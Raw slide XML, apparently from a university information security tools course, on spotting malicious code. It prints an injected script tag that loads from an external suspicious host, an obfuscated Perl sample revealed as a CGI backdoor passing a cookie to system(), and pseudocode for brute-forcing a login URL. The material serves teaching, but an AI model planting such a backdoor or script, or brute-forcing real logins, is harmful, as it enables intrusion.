              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (especially if it calls to an external IP/hostname), randomly generated functions/variables/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http:// rmore79riveru. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rr.nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nl.php?p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=d "&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	= probably not legitimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113268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Information Security Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ENPM685</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30748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malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="2008-011517-3725-99.1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-3638" b="-3638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1367091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malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="2010-11-26_01.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-30488" b="-30488"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5915603"/>
            <a:ext cx="7452862" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.kahusecurity.com/2010/malicious-javascript-analysis/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87517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Yet another example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://umd.box.com/s/461tfu9kx4lgpy13sbv7kadk57mqdj93</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(Pulled from a real investigation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>WARNING: This is old so the C&amp;C infrastructure is most likely offline but be careful playing with this on a system you care about.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381743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E07E-D51B-A149-B7CE-BD399A845481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Case of the Perl ASCII Art…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1658865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2904D-60B1-4644-BCE9-5F75FAABE2D4}"/>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2AC9782-1709-594F-A74B-5959113C1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461" y="0"/>
            <a:ext cx="8558213" cy="6836734"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206334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684E-238E-774C-8125-A81F05637759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095F409E-6B44-E045-824F-BCF056D49250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '”’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '"'.</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373699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C1604-9C5D-BF43-8360-6B647EEF2E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hmmm….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7C04129-9AEF-EB45-9401-EFBC09F54CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use CGI;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$q = new CGI;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $q-&gt;header();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system $q-&gt;cookie('a') if $q-&gt;cookie('a');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351083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9847-A679-4C4D-A993-A77CFD6362EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DIY Brute Forcing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F3C269-1F3A-E84A-9BE1-B1B5DAD29DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember me?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9A275D-D3FF-F345-9CD7-15ADB2477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2432050"/>
            <a:ext cx="5410200" cy="3136900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1840702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7D0A-096E-8E47-939F-07F89BC480A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrong Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCBE6C2D-D8B6-0444-92CE-194B85EC4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42912"/>
            <a:ext cx="7620000" cy="3172126"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219137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726E-D6B6-B941-9A54-B87D2B7B91E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pseudocode </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856AC0D8-A6F5-7346-9F34-972939BC81FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Take a password file (passwords) and go line by line substituting each line in the “password” field of the URL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If we get something that is a different content size then maybe we have found the password….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To make life easy we’ll specify the URL in the code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69E9AB71-87B8-8D4B-AF54-F5481BCD3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909" y="4440237"/>
            <a:ext cx="5720715" cy="2200275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398423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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Python more in depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>DUN DUN DUN!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3040008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4DF1-0134-D74C-B70F-35A8C51AB4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987D35-8A1F-2B45-8DAA-A9D7282D4F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="97536" y="1600200"/>
            <a:ext cx="8290560" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
